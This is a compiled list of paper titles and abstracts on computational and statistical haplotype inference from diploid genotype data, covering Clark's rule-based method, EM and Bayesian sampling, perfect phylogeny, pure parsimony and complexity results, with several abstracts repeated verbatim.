--- paper_title: Haplotype Inference in Random Population Samples paper_content: Contemporary genotyping and sequencing methods do not provide information on linkage phase in diploid organisms. The application of statistical methods to infer and reconstruct linkage phase in samples of diploid sequences is a potentially time- and labor-saving method. The Stephens-Smith-Donnelly (SSD) algorithm is one such method, which incorporates concepts from population genetics theory in a Markov chain-Monte Carlo technique. We applied a modified SSD method, as well as the expectation-maximization and partition-ligation algorithms, to sequence data from eight loci spanning >1 Mb on the human X chromosome. We demonstrate that the accuracy of the modified SSD method is better than that of the other algorithms and is superior in terms of the number of sites that may be processed. Also, we find phase reconstructions by the modified SSD method to be highly accurate over regions with high linkage disequilibrium (LD). If only polymorphisms with a minor allele frequency >0.2 are analyzed and scored according to the fraction of neighbor relations correctly called, reconstructions are 95.2% accurate over entire 100-kb stretches and are 98.6% accurate within blocks of high LD. --- paper_title: Inference of haplotypes from PCR-amplified samples of diploid populations. paper_content: Direct sequencing of genomic DNA from diploid individuals leads to ambiguities on sequencing gels whenever there is more than one mismatching site in the sequences of the two orthologous copies of a gene. While these ambiguities cannot be resolved from a single sample without resorting to other experimental methods (such as cloning in the traditional way), population samples may be useful for inferring haplotypes. For each individual in the sample that is homozygous for the amplified sequence, there are no ambiguities in the identification of the allele’s sequence. The sequences of other alleles can be inferred by taking the remaining sequence after “subtracting off’ the sequencing ladder of each known site. Details of the algorithm for extracting allelic sequences from such data are presented here, along with some population-genetic considerations that influence the likelihood for success of the method. The algorithm also applies to the problem of inferring haplotype frequencies of closely linked restriction-site polymorphisms. --- paper_title: Inference of Haplotypes from Samples of Diploid Populations: Complexity and Algorithms paper_content: The next phase of human genomics will involve large-scale screens of populations for significant DNA polymorphisms, notably single nucleotide polymorphisms (SNPs). Dense human SNP maps are currently under construction. However, the utility of those maps and screens will be limited by the fact that humans are diploid and it is presently difficult to get separate data on the two "copies." Hence, genotype (blended) SNP data will be collected, and the desired haplotype (partitioned) data must then be (partially) inferred. A particular nondeterministic inference algorithm was proposed and studied by Clark (1990) and extensively used by Clark et al. (1998). In this paper, we more closely examine that inference method and the question of whether we can obtain an efficient, deterministic variant to optimize the obtained inferences. 
We show that the problem is NP-hard and, in fact, Max-SNP complete; that the reduction creates problem instances conforming to a severe restriction believed to hold in real data (Clark, 1990); and that even if we first use a natural exponential-time operation, the remaining optimization problem is NP-hard. However, we also develop, implement, and test an approach based on that operation and (integer) linear programming. The approach works quickly and correctly on simulated data. --- paper_title: Apolipoprotein E Variation at the Sequence Haplotype Level: Implications for the Origin and Maintenance of a Major Human Polymorphism paper_content: Three common protein isoforms of apolipoprotein E (apoE), encoded by the ε2, ε3, and ε4 alleles of the APOE gene, differ in their association with cardiovascular and Alzheimer's disease risk. To gain a better understanding of the genetic variation underlying this important polymorphism, we identified sequence haplotype variation in 5.5 kb of genomic DNA encompassing the whole of the APOE locus and adjoining flanking regions in 96 individuals from four populations: blacks from Jackson, MS (n = 48 chromosomes), Mayans from Campeche, Mexico (n = 48), Finns from North Karelia, Finland (n = 48), and non-Hispanic whites from Rochester, MN (n = 48). In the region sequenced, 23 sites varied (21 single nucleotide polymorphisms, or SNPs, 1 diallelic indel, and 1 multiallelic indel). The 22 diallelic sites defined 31 distinct haplotypes in the sample. The estimate of nucleotide diversity (site-specific heterozygosity) for the locus was 0.0005±0.0003. Sequence analysis of the chimpanzee APOE gene showed that it was most closely related to human ε4-type haplotypes, differing from the human consensus sequence at 67 synonymous (54 substitutions and 13 indels) and 9 nonsynonymous fixed positions. The evolutionary history of allelic divergence within humans was inferred from the pattern of haplotype relationships. This analysis suggests that haplotypes defining the ε3 and ε2 alleles are derived from the ancestral ε4s and that the ε3 group of haplotypes have increased in frequency, relative to ε4s, in the past 200,000 years. Substantial heterogeneity exists within all three classes of sequence haplotypes, and there are important interpopulation differences in the sequence variation underlying the protein isoforms that may be relevant to interpreting conflicting reports of phenotypic associations with variation in the common protein isoforms. --- paper_title: Haplotype Structure and Population Genetic Inferences from Nucleotide-Sequence Variation in Human Lipoprotein Lipase paper_content: Summary Allelic variation in 9.7 kb of genomic DNA sequence from the human lipoprotein lipase gene (LPL) was scored in 71 healthy individuals (142 chromosomes) from three populations: African Americans (24) from Jackson, MS; Finns (24) from North Karelia, Finland; and non-Hispanic Whites (23) from Rochester, MN. The sequences had a total of 88 variable sites, with a nucleotide diversity (site-specific heterozygosity) of .002±.001 across this 9.7-kb region. The frequency spectrum of nucleotide variation exhibited a slight excess of heterozygosity, but, in general, the data fit expectations of the infinite-sites model of mutation and genetic drift. Allele-specific PCR helped resolve linkage phases, and a total of 88 distinct haplotypes were identified.
For 1,410 (64%) of the 2,211 site pairs, all four possible gametes were present in these haplotypes, reflecting a rich history of past recombination. Despite the strong evidence for recombination, extensive linkage disequilibrium was observed. The number of haplotypes generally is much greater than the number expected under the infinite-sites model, but there was sufficient multisite linkage disequilibrium to reveal two major clades, which appear to be very old. Variation in this region of LPL may depart from the variation expected under a simple, neutral model, owing to complex historical patterns of population founding, drift, selection, and recombination. These data suggest that the design and interpretation of disease-association studies may not be as straightforward as often is assumed. --- paper_title: Bayesian Haplotype Inference for Multiple Linked Single-Nucleotide Polymorphisms paper_content: Haplotypes have gained increasing attention in the mapping of complex-disease genes, because of the abundance of single-nucleotide polymorphisms (SNPs) and the limited power of conventional single-locus analyses. It has been shown that haplotype-inference methods such as Clark's algorithm, the expectation-maximization algorithm, and a coalescence-based iterative-sampling algorithm are fairly effective and economical alternatives to molecular-haplotyping methods. To contend with some weaknesses of the existing algorithms, we propose a new Monte Carlo approach. In particular, we first partition the whole haplotype into smaller segments. Then, we use the Gibbs sampler both to construct the partial haplotypes of each segment and to assemble all the segments together. Our algorithm can accurately and rapidly infer haplotypes for a large number of linked SNPs. By using a wide variety of real and simulated data sets, we demonstrate the advantages of our Bayesian algorithm, and we show that it is robust to the violation of Hardy-Weinberg equilibrium, to the presence of missing data, and to occurrences of recombination hotspots. --- paper_title: Inference of haplotypes from PCR-amplified samples of diploid populations. paper_content: Direct sequencing of genomic DNA from diploid individuals leads to ambiguities on sequencing gels whenever there is more than one mismatching site in the sequences of the two orthologous copies of a gene. While these ambiguities cannot be resolved from a single sample without resorting to other experimental methods (such as cloning in the traditional way), population samples may be useful for inferring haplotypes. For each individual in the sample that is homozygous for the amplified sequence, there are no ambiguities in the identification of the allele’s sequence. The sequences of other alleles can be inferred by taking the remaining sequence after “subtracting off’ the sequencing ladder of each known site. Details of the algorithm for extracting allelic sequences from such data are presented here, along with some population-genetic considerations that influence the likelihood for success of the method. The algorithm also applies to the problem of inferring haplotype frequencies of closely linked restriction-site polymorphisms. --- paper_title: Inference of haplotypes from PCR-amplified samples of diploid populations. paper_content: Direct sequencing of genomic DNA from diploid individuals leads to ambiguities on sequencing gels whenever there is more than one mismatching site in the sequences of the two orthologous copies of a gene. 
While these ambiguities cannot be resolved from a single sample without resorting to other experimental methods (such as cloning in the traditional way), population samples may be useful for inferring haplotypes. For each individual in the sample that is homozygous for the amplified sequence, there are no ambiguities in the identification of the allele’s sequence. The sequences of other alleles can be inferred by taking the remaining sequence after “subtracting off’ the sequencing ladder of each known site. Details of the algorithm for extracting allelic sequences from such data are presented here, along with some population-genetic considerations that influence the likelihood for success of the method. The algorithm also applies to the problem of inferring haplotype frequencies of closely linked restriction-site polymorphisms. --- paper_title: Inference of Haplotypes from Samples of Diploid Populations: Complexity and Algorithms paper_content: The next phase of human genomics will involve large-scale screens of populations for significant DNA polymorphisms, notably single nucleotide polymorphisms (SNPs). Dense human SNP maps are currently under construction. However, the utility of those maps and screens will be limited by the fact that humans are diploid and it is presently difficult to get separate data on the two "copies." Hence, genotype (blended) SNP data will be collected, and the desired haplotype (partitioned) data must then be (partially) inferred. A particular nondeterministic inference algorithm was proposed and studied by Clark (1990) and extensively used by Clark et al. (1998). In this paper, we more closely examine that inference method and the question of whether we can obtain an efficient, deterministic variant to optimize the obtained inferences. We show that the problem is NP-hard and, in fact, Max-SNP complete; that the reduction creates problem instances conforming to a severe restriction believed to hold in real data (Clark, 1990); and that even if we first use a natural exponential-time operation, the remaining optimization problem is NP-hard. However, we also develop, implement, and test an approach based on that operation and (integer) linear programming. The approach works quickly and correctly on simulated data. --- paper_title: Inference of Haplotypes from Samples of Diploid Populations: Complexity and Algorithms paper_content: The next phase of human genomics will involve large-scale screens of populations for significant DNA polymorphisms, notably single nucleotide polymorphisms (SNPs). Dense human SNP maps are currently under construction. However, the utility of those maps and screens will be limited by the fact that humans are diploid and it is presently difficult to get separate data on the two "copies." Hence, genotype (blended) SNP data will be collected, and the desired haplotype (partitioned) data must then be (partially) inferred. A particular nondeterministic inference algorithm was proposed and studied by Clark (1990) and extensively used by Clark et al. (1998). In this paper, we more closely examine that inference method and the question of whether we can obtain an efficient, deterministic variant to optimize the obtained inferences. We show that the problem is NP-hard and, in fact, Max-SNP complete; that the reduction creates problem instances conforming to a severe restriction believed to hold in real data (Clark, 1990); and that even if we first use a natural exponential-time operation, the remaining optimization problem is NP-hard. 
However, we also develop, implement, and test an approach based on that operation and (integer) linear programming. The approach works quickly and correctly on simulated data. --- paper_title: Combinatorial Optimization: Algorithms and Complexity paper_content: This clearly written , mathematically rigorous text includes a novel algorithmic exposition of the simplex method and also discusses the Soviet ellipsoid algorithm for linear programming; efficient algorithms for network flow, matching, spanning trees, and matroids; the theory of NP-complete problems; approximation algorithms, local search heuristics for NPcomplete problems, more. All chapters are supplemented by thoughtprovoking problems. A useful work for graduate-level students with backgrounds in computer science, operations research, and electrical engineering. Mathematicians wishing a self-contained introduction need look no further.—American Mathematical Monthly. 1982 ed. --- paper_title: Inference of Haplotypes from Samples of Diploid Populations: Complexity and Algorithms paper_content: The next phase of human genomics will involve large-scale screens of populations for significant DNA polymorphisms, notably single nucleotide polymorphisms (SNPs). Dense human SNP maps are currently under construction. However, the utility of those maps and screens will be limited by the fact that humans are diploid and it is presently difficult to get separate data on the two "copies." Hence, genotype (blended) SNP data will be collected, and the desired haplotype (partitioned) data must then be (partially) inferred. A particular nondeterministic inference algorithm was proposed and studied by Clark (1990) and extensively used by Clark et al. (1998). In this paper, we more closely examine that inference method and the question of whether we can obtain an efficient, deterministic variant to optimize the obtained inferences. We show that the problem is NP-hard and, in fact, Max-SNP complete; that the reduction creates problem instances conforming to a severe restriction believed to hold in real data (Clark, 1990); and that even if we first use a natural exponential-time operation, the remaining optimization problem is NP-hard. However, we also develop, implement, and test an approach based on that operation and (integer) linear programming. The approach works quickly and correctly on simulated data. --- paper_title: Inference of haplotypes from PCR-amplified samples of diploid populations. paper_content: Direct sequencing of genomic DNA from diploid individuals leads to ambiguities on sequencing gels whenever there is more than one mismatching site in the sequences of the two orthologous copies of a gene. While these ambiguities cannot be resolved from a single sample without resorting to other experimental methods (such as cloning in the traditional way), population samples may be useful for inferring haplotypes. For each individual in the sample that is homozygous for the amplified sequence, there are no ambiguities in the identification of the allele’s sequence. The sequences of other alleles can be inferred by taking the remaining sequence after “subtracting off’ the sequencing ladder of each known site. Details of the algorithm for extracting allelic sequences from such data are presented here, along with some population-genetic considerations that influence the likelihood for success of the method. The algorithm also applies to the problem of inferring haplotype frequencies of closely linked restriction-site polymorphisms. 
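The Clark (1990) subtraction rule described in the entry above lends itself to a compact illustration. The following is a minimal sketch under an assumed toy encoding, genotypes as strings over {0,1,2} with 2 marking a heterozygous site and haplotypes as strings over {0,1}; it is not the published implementation, only the greedy idea of seeding a reference list with unambiguous genotypes and then repeatedly subtracting a known compatible haplotype from an ambiguous genotype to infer its partner.

```python
def compatible(hap, geno):
    """hap can be one of the two sequences underlying geno if it matches
    every homozygous site; heterozygous sites (coded '2') are unconstrained."""
    return all(g == "2" or h == g for h, g in zip(hap, geno))

def complement(hap, geno):
    """Clark-style subtraction: the partner haplotype forced by hap and geno."""
    return "".join(g if g != "2" else ("1" if h == "0" else "0")
                   for h, g in zip(hap, geno))

def clark_inference(genotypes):
    known, ambiguous, resolved = set(), [], {}
    for g in genotypes:
        if g.count("2") == 0:            # fully homozygous: haplotype = genotype
            known.add(g)
        elif g.count("2") == 1:          # one heterozygous site: phase is trivial
            h = g.replace("2", "0")
            known.update({h, complement(h, g)})
        else:
            ambiguous.append(g)
    progress = True
    while progress and ambiguous:        # greedy passes until nothing changes
        progress = False
        for g in list(ambiguous):
            match = next((h for h in known if compatible(h, g)), None)
            if match is not None:
                partner = complement(match, g)
                known.add(partner)
                resolved[g] = (match, partner)
                ambiguous.remove(g)
                progress = True
    return resolved, ambiguous           # leftovers are the "orphan" genotypes

resolved, orphans = clark_inference(["01001", "21021"])
print(resolved)   # {'21021': ('01001', '11011')}
print(orphans)    # []
```

The order in which ambiguous genotypes are visited, and which compatible haplotype is subtracted first, can change the outcome; that ambiguity is exactly what the maximum-resolution formulation in the preceding entries turns into an optimization problem.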
--- paper_title: Inference of Haplotypes from Samples of Diploid Populations: Complexity and Algorithms paper_content: The next phase of human genomics will involve large-scale screens of populations for significant DNA polymorphisms, notably single nucleotide polymorphisms (SNPs). Dense human SNP maps are currently under construction. However, the utility of those maps and screens will be limited by the fact that humans are diploid and it is presently difficult to get separate data on the two "copies." Hence, genotype (blended) SNP data will be collected, and the desired haplotype (partitioned) data must then be (partially) inferred. A particular nondeterministic inference algorithm was proposed and studied by Clark (1990) and extensively used by Clark et al. (1998). In this paper, we more closely examine that inference method and the question of whether we can obtain an efficient, deterministic variant to optimize the obtained inferences. We show that the problem is NP-hard and, in fact, Max-SNP complete; that the reduction creates problem instances conforming to a severe restriction believed to hold in real data (Clark, 1990); and that even if we first use a natural exponential-time operation, the remaining optimization problem is NP-hard. However, we also develop, implement, and test an approach based on that operation and (integer) linear programming. The approach works quickly and correctly on simulated data. --- paper_title: Analysis and Exploration of the Use of Rule-Based Algorithms and Consensus Methods for the Inferral of Haplotypes paper_content: The difficulty of experimental determination of haplotypes from phase-unknown genotypes has stimulated the development of nonexperimental inferral methods. One well-known approach for a group of unrelated individuals involves using the trivially deducible haplotypes (those found in individuals with zero or one heterozygous sites) and a set of rules to infer the haplotypes underlying ambiguous genotypes (those with two or more heterozygous sites). Neither the manner in which this “rule-based” approach should be implemented nor the accuracy of this approach has been adequately assessed. We implemented eight variations of this approach that differed in how a reference list of haplotypes was derived and in the rules for the analysis of ambiguous genotypes. We assessed the accuracy of these variations by comparing predicted and experimentally determined haplotypes involving nine polymorphic sites in the human apolipoprotein E (APOE) locus. The eight variations resulted in substantial differences in the average number of correctly inferred haplotype pairs. More than one set of inferred haplotype pairs was found for each of the variations we analyzed, implying that the rule-based approach is not sufficient by itself for haplotype inferral, despite its appealing simplicity. Accordingly, we explored consensus methods in which multiple inferrals for a given ambiguous genotype are combined to generate a single inferral; we show that the set of these “consensus” inferrals for all ambiguous genotypes is more accurate than the typical single set of inferrals chosen at random. We also use a consensus prediction to divide ambiguous genotypes into those whose algorithmic inferral is certain or almost certain and those whose less certain inferral makes molecular inferral preferable. 
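The consensus idea in the rule-based study above can be sketched in the same assumed toy encoding: because a single greedy run depends on the processing order and on which reference haplotype is subtracted, many randomized runs are made and the per-genotype inferrals are combined by majority vote. The snippet below is only an illustrative sketch of that voting scheme, not the authors' implementation.

```python
import random
from collections import Counter

def _complement(hap, geno):
    return "".join(g if g != "2" else ("1" if h == "0" else "0")
                   for h, g in zip(hap, geno))

def _resolve_once(genotypes, rng):
    """One randomized greedy pass of a Clark-style subtraction rule."""
    known = {g for g in genotypes if "2" not in g}
    order = [g for g in genotypes if "2" in g]
    rng.shuffle(order)
    calls = {}
    for g in order:
        fits = [h for h in known
                if all(c == "2" or c == hc for hc, c in zip(h, g))]
        if fits:
            h1 = rng.choice(fits)
            h2 = _complement(h1, g)
            known.add(h2)
            calls[g] = tuple(sorted((h1, h2)))
    return calls

def consensus(genotypes, runs=200, seed=1):
    """Majority vote over many randomized runs, one call per ambiguous genotype."""
    rng = random.Random(seed)
    votes = {g: Counter() for g in genotypes if "2" in g}
    for _ in range(runs):
        for g, pair in _resolve_once(genotypes, rng).items():
            votes[g][pair] += 1
    return {g: counts.most_common(1)[0] for g, counts in votes.items() if counts}

print(consensus(["01001", "11011", "21021", "22021"]))
```

In this toy run the last genotype's vote is split between two competing haplotype pairs; an uncertain consensus of that kind is roughly the situation the study flags as better resolved by molecular methods.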
--- paper_title: An almost linear-time algorithm for graph realization paper_content: Given a {0, 1}-matrix M, the graph-realization problem for M is to find a tree T such that the columns of M are incidence vectors of paths in T, or to show that no such T exists. An algorithm is presented for this problem the time complexity of which is very nearly linear in the number of ones in M. --- paper_title: Perfect phylogeny haplotyper: haplotype inferral using a tree model paper_content: Summary: We have developed an efficient program, the Perfect Phylogeny Haplotyper (PPH) that takes in unphased population genotype data, and determines if that data can be explained by haplotype pairs that could have evolved on a perfect phylogeny. Availability: Executable code for four common platforms is available at: http://wwwcsif.cs.ucdavis.edu/∼gusfield --- paper_title: Haplotyping as perfect phylogeny: A direct approach paper_content: A full haplotype map of the human genome will prove extremely valuable as it will be used in large-scale screens of populations to associate specific haplotypes with specific complex genetic-influenced diseases. A haplotype map project has been announced by NIH. The biological key to that project is the surprising fact that some human genomic DNA can be partitioned into long blocks where genetic recombination has been rare, leading to strikingly fewer distinct haplotypes in the population than previously expected (Helmuth, 2001; Daly et al., 2001; Stephens et al., 2001; Friss et al., 2001). In this paper we explore the algorithmic implications of the no-recombination in long blocks observation, for the problem of inferring haplotypes in populations. This assumption, together with the standard population-genetic assumption of infinite sites, motivates a model of haplotype evolution where the haplotypes in a population are assumed to evolve along a coalescent, which as a rooted tree is a perfect phylogeny. We consider the following algorithmic problem, called the perfect phylogeny haplotyping problem (PPH), which was introduced by Gusfield (2002) - given n genotypes of length m each, does there exist a set of at most 2n haplotypes such that each genotype is generated by a pair of haplotypes from this set, and such that this set can be derived on a perfect phylogeny? The approach taken by Gusfield (2002) to solve this problem reduces it to established, deep results and algorithms from matroid and graph theory. Although that reduction is quite simple and the resulting algorithm nearly optimal in speed, taken as a whole that approach is quite involved, and in particular, challenging to program. Moreover, anyone wishing to fully establish, by reading existing literature, the correctness of the entire algorithm would need to read several deep and difficult papers in graph and matroid theory. However, as stated by Gusfield (2002), many simplifications are possible and the list of "future work" in Gusfield (2002) began with the task of developing a simpler, more direct, yet still efficient algorithm. This paper accomplishes that goal, for both the rooted and unrooted PPH problems. It establishes a simple, easy-to-program, O(nm(2))-time algorithm that determines whether there is a PPH solution for input genotypes and produces a linear-space data structure to represent all of the solutions. The approach allows complete, self-contained proofs. 
In addition to algorithmic simplicity, the approach here makes the representation of all solutions more intuitive than in Gusfield (2002), and solves another goal from that paper, namely, to prove a nontrivial upper bound on the number of PPH solutions, showing that that number is vastly smaller than the number of haplotype solutions (each solution being a set of n pairs of haplotypes that can generate the genotypes) when the perfect phylogeny requirement is not imposed. --- paper_title: Efficient reconstruction of haplotype structure via perfect phylogeny paper_content: Each person's genome contains two copies of each chromosome, one inherited from the father and the other from the mother. A person's genotype specifies the pair of bases at each site, but does not specify which base occurs on which chromosome. The sequence of each chromosome separately is called a haplotype. The determination of the haplotypes within a population is essential for understanding genetic variation and the inheritance of complex diseases. The haplotype mapping project, a successor to the human genome project, seeks to determine the common haplotypes in the human population. Since experimental determination of a person's genotype is less expensive than determining its component haplotypes, algorithms are required for computing haplotypes from genotypes. Two observations aid in this process: first, the human genome contains short blocks within which only a few different haplotypes occur; second, as suggested by Gusfield, it is reasonable to assume that the haplotypes observed within a block have evolved according to a perfect phylogeny, in which at most one mutation event has occurred at any site, and no recombination occurred at the given region. We present a simple and efficient polynomial-time algorithm for inferring haplotypes from the genotypes of a set of individuals assuming a perfect phylogeny. Using a reduction to 2-SAT we extend this algorithm to handle constraints that apply when we have genotypes from both parents and child. We also present a hardness result for the problem of removing the minimum number of individuals from a population to ensure that the genotypes of the remaining individuals are consistent with a perfect phylogeny. Our algorithms have been tested on real data and give biologically meaningful results. Our webserver (http://www.cs.columbia.edu/compbio/hap/) is publicly available for predicting haplotypes from genotype data and partitioning genotype data into blocks. --- paper_title: Inference of haplotypes from PCR-amplified samples of diploid populations. paper_content: Direct sequencing of genomic DNA from diploid individuals leads to ambiguities on sequencing gels whenever there is more than one mismatching site in the sequences of the two orthologous copies of a gene. While these ambiguities cannot be resolved from a single sample without resorting to other experimental methods (such as cloning in the traditional way), population samples may be useful for inferring haplotypes. For each individual in the sample that is homozygous for the amplified sequence, there are no ambiguities in the identification of the allele’s sequence. The sequences of other alleles can be inferred by taking the remaining sequence after “subtracting off’ the sequencing ladder of each known site. Details of the algorithm for extracting allelic sequences from such data are presented here, along with some population-genetic considerations that influence the likelihood for success of the method. 
The algorithm also applies to the problem of inferring haplotype frequencies of closely linked restriction-site polymorphisms. --- paper_title: Haplotyping Populations: Complexity and Approximations paper_content: We study the computational complexity of the following haplotyping problem. Given a set of genotypes G, find a minimum cardinality set of haplotypes which explains G. Here, a genotype g is an n-ary string over the alphabet {A,B,-} and an haplotype h is an n-ary string over the alphabet {A,B}. A set of haplotypes H is said to explain G if for every g in G there are h_1, h_2 in H such that h_1 + h_2 = g. The position-wise sum h_1 + h_2 indicates the genotype which has a '-' in the positions where h_1 and h_2 disagree, and the same value as h_1 and h_2 where they agree. We show the APX-hardness of the problem even in the case the number of '-' symbols is at most 3 for every g in G. We give a $\sqrt{|G|}$-approximation algorithm for the general case, and a $2^{k-1}$-approximation algorithm when the number of '-' symbols is at most k for every g in G. --- paper_title: Haplotype inference by pure Parsimony paper_content: The next high-priority phase of human genomics will involve the development and use of a full Haplotype Map of the human genome [7]. A critical, perhaps dominating, problem in all such efforts is the inference of large-scale SNP-haplotypes from raw genotype SNP data. This is called the Haplotype Inference (HI) problem. Abstractly, input to the HI problem is a set of n strings over a ternary alphabet. A solution is a set of at most 2n strings over the binary alphabet, so that each input string can be "generated" by some pair of the binary strings in the solution. For greatest biological fidelity, a solution should be consistent with, or evaluated by, properties derived from an appropriate genetic model. ::: ::: A natural model, that has been suggested repeatedly is called here the Pure Parsimony model, where the goal is to find a smallest set of binary strings that can generate the n input strings. The problem of finding such a smallest set is called the Pure Parsimony Problem. Unfortunately, the Pure Parsimony problem is NP-hard, and no paper has previously shown how an optimal Pure-parsimony solution can be computed efficiently for problem instances of the size of current biological interest. In this paper, we show how to formulate the Pure-parsimony problem as an integer linear program; we explain how to improve the practicality of the integer programming formulation; and we present the results of extensive experimentation we have done to show the time and memory practicality of the method, and to compare its accuracy against solutions found by the widely used general haplotyping program PHASE. We also formulate and experiment with variations of the Pure-Parsimony criteria, that allow greater practicality. The results are that the Pure Parsimony problem can be solved efficiently in practice for a wide range of problem instances of current interest in biology. Both the time needed for a solution, and the accuracy of the solution, depend on the level of recombination in the input strings. The speed of the solution improves with increasing recombination, but the accuracy of the solution decreases with increasing recombination. 
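The two entries above define the objects behind pure parsimony: a pair of haplotypes explains a genotype (the papers use the alphabet {A,B,-}; 0/1/2 below is an equivalent encoding with 2 for the mixed symbol), and the goal is the smallest haplotype set explaining every genotype. The sketch below checks explanation and solves toy instances by exhaustive search; it only makes the definitions concrete, since the practical formulation in the cited work is an integer linear program.

```python
from itertools import combinations, product

def explains(h1, h2, geno):
    """h1 + h2 = geno: equal sites keep their value, differing sites become '2'."""
    return all(g == (a if a == b else "2") for a, b, g in zip(h1, h2, geno))

def expansions(geno):
    """All haplotype pairs consistent with a genotype (2**k phasings for k het sites)."""
    het = [i for i, g in enumerate(geno) if g == "2"]
    for bits in product("01", repeat=len(het)):
        h1, h2 = list(geno), list(geno)
        for pos, b in zip(het, bits):
            h1[pos], h2[pos] = b, ("1" if b == "0" else "0")
        yield "".join(h1), "".join(h2)

def pure_parsimony(genotypes):
    """Smallest set of haplotypes explaining every genotype, by brute force;
    only viable for toy inputs, unlike an ILP formulation."""
    candidates = sorted({h for g in genotypes for pair in expansions(g) for h in pair})
    for size in range(1, len(candidates) + 1):
        for subset in combinations(candidates, size):
            pool = list(subset)
            if all(any(explains(h1, h2, g) for h1 in pool for h2 in pool)
                   for g in genotypes):
                return sorted(subset)
    return []

# Three genotypes that a resolution built around the all-zero haplotype would
# cover with four haplotypes, while pure parsimony needs only three.
print(pure_parsimony(["022", "202", "220"]))   # ['001', '010', '100']
```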
--- paper_title: Inference of Haplotypes from Samples of Diploid Populations: Complexity and Algorithms paper_content: The next phase of human genomics will involve large-scale screens of populations for significant DNA polymorphisms, notably single nucleotide polymorphisms (SNPs). Dense human SNP maps are currently under construction. However, the utility of those maps and screens will be limited by the fact that humans are diploid and it is presently difficult to get separate data on the two "copies." Hence, genotype (blended) SNP data will be collected, and the desired haplotype (partitioned) data must then be (partially) inferred. A particular nondeterministic inference algorithm was proposed and studied by Clark (1990) and extensively used by Clark et al. (1998). In this paper, we more closely examine that inference method and the question of whether we can obtain an efficient, deterministic variant to optimize the obtained inferences. We show that the problem is NP-hard and, in fact, Max-SNP complete; that the reduction creates problem instances conforming to a severe restriction believed to hold in real data (Clark, 1990); and that even if we first use a natural exponential-time operation, the remaining optimization problem is NP-hard. However, we also develop, implement, and test an approach based on that operation and (integer) linear programming. The approach works quickly and correctly on simulated data. --- paper_title: Bayesian Haplotype Inference for Multiple Linked Single-Nucleotide Polymorphisms paper_content: Haplotypes have gained increasing attention in the mapping of complex-disease genes, because of the abundance of single-nucleotide polymorphisms (SNPs) and the limited power of conventional single-locus analyses. It has been shown that haplotype-inference methods such as Clark's algorithm, the expectation-maximization algorithm, and a coalescence-based iterative-sampling algorithm are fairly effective and economical alternatives to molecular-haplotyping methods. To contend with some weaknesses of the existing algorithms, we propose a new Monte Carlo approach. In particular, we first partition the whole haplotype into smaller segments. Then, we use the Gibbs sampler both to construct the partial haplotypes of each segment and to assemble all the segments together. Our algorithm can accurately and rapidly infer haplotypes for a large number of linked SNPs. By using a wide variety of real and simulated data sets, we demonstrate the advantages of our Bayesian algorithm, and we show that it is robust to the violation of Hardy-Weinberg equilibrium, to the presence of missing data, and to occurrences of recombination hotspots. --- paper_title: Large scale reconstruction of haplotypes from genotype data paper_content: Critical to the understanding of the genetic basis for complex diseases is the modeling of human variation. Most of this variation can be characterized by single nucleotide polymorphisms (SNPs) which are mutations at a single nucleotide position. To characterize an individual's variation, we must determine an individual's haplotype or which nucleotide base occurs at each position of these common SNPs for each chromosome. In this paper, we present results for a highly accurate method for haplotype resolution from genotype data. Our method leverages a new insight into the underlying structure of haplotypes which shows that SNPs are organized in highly correlated "blocks". The majority of individuals have one of about four common haplotypes in each block. 
Our method partitions the SNPs into blocks and for each block, we predict the common haplotypes and each individual's haplotype. We evaluate our method over biological data. Our method predicts the common haplotypes perfectly and has a very low error rate (0.47%) when taking into account the predictions for the uncommon haplotypes. Our method is extremely efficient compared to previous methods, (a matter of seconds where previous methods needed hours). Its efficiency allows us to find the block partition of the haplotypes, to cope with missing data and to work with large data sets such as genotypes for thousands of SNPs for hundreds of individuals. The algorithm is available via webserver at http://www.cs.columbia.edu/compbio/hap. --- paper_title: Efficient reconstruction of phylogenetic networks with constrained recombination paper_content: A phylogenetic network is a generalization of a phylogenetic tree, allowing structural properties that are not treelike. With the growth of genomic data, much of which does not fit ideal tree models, there is greater need to understand the algorithmics and combinatorics of phylogenetic networks. We consider the problem of determining whether the sequences can be derived on a phylogenetic network where the recombination cycles are node disjoint. In this paper, we call such a phylogenetic network a "galled-tree". By more deeply analysing the combinatorial constraints on cycle-disjoint phylogenetic networks, we obtain an efficient algorithm that is guaranteed to be both a necessary and sufficient test for the existence of a galled-tree for the data. If there is a galled-tree, the algorithm constructs one and obtains an implicit representation of all the galled trees for the data, and can create these in linear time for each one. We also note two additional results related to galled trees: first, any set of sequences that can be derived on a galled tree can be derived on a true tree (without recombination cycles), where at most one back mutation is allowed per site; second, the site compatibility problem (which is NP-hard in general) can be solved in linear time for any set of sequences that can be derived on a galled tree. The combinatorial constraints we develop apply (for the most part) to node-disjoint cycles in any phylogenetic network (not just galled-trees), and can be used for example to prove that a given site cannot be on a node-disjoint cycle in any phylogenetic network. Perhaps more important than the specific results about galled-trees, we introduce an approach that can be used to study recombination in phylogenetic networks that go beyond galled-trees. ---
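Both the perfect-phylogeny entries and the constrained-recombination entry above rest on site compatibility, usually checked with the classical four-gamete test (also the statistic quoted in the lipoprotein lipase study earlier in this list). The function below is a generic sketch of that test on a binary haplotype matrix; it is standard textbook material rather than code from any of the cited papers.

```python
from itertools import combinations

def four_gamete_conflicts(haplotypes):
    """Return the site pairs at which all four gametes 00, 01, 10, 11 appear.
    Under the infinite-sites model such a pair cannot lie on a single perfect
    phylogeny, so it signals recombination (or recurrent mutation)."""
    n_sites = len(haplotypes[0])
    conflicts = []
    for i, j in combinations(range(n_sites), 2):
        gametes = {(h[i], h[j]) for h in haplotypes}
        if len(gametes) == 4:
            conflicts.append((i, j))
    return conflicts

# Toy data: sites 0 and 1 show all four gametes, so these haplotypes cannot be
# placed on one perfect phylogeny without invoking recombination.
sample = ["00", "01", "10", "11"]
print(four_gamete_conflicts(sample))   # [(0, 1)]
```

Site pairs that fail the test cannot fit a single perfect phylogeny under the infinite-sites assumption, which is why PPH-style methods are applied within blocks showing few or no such conflicts.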
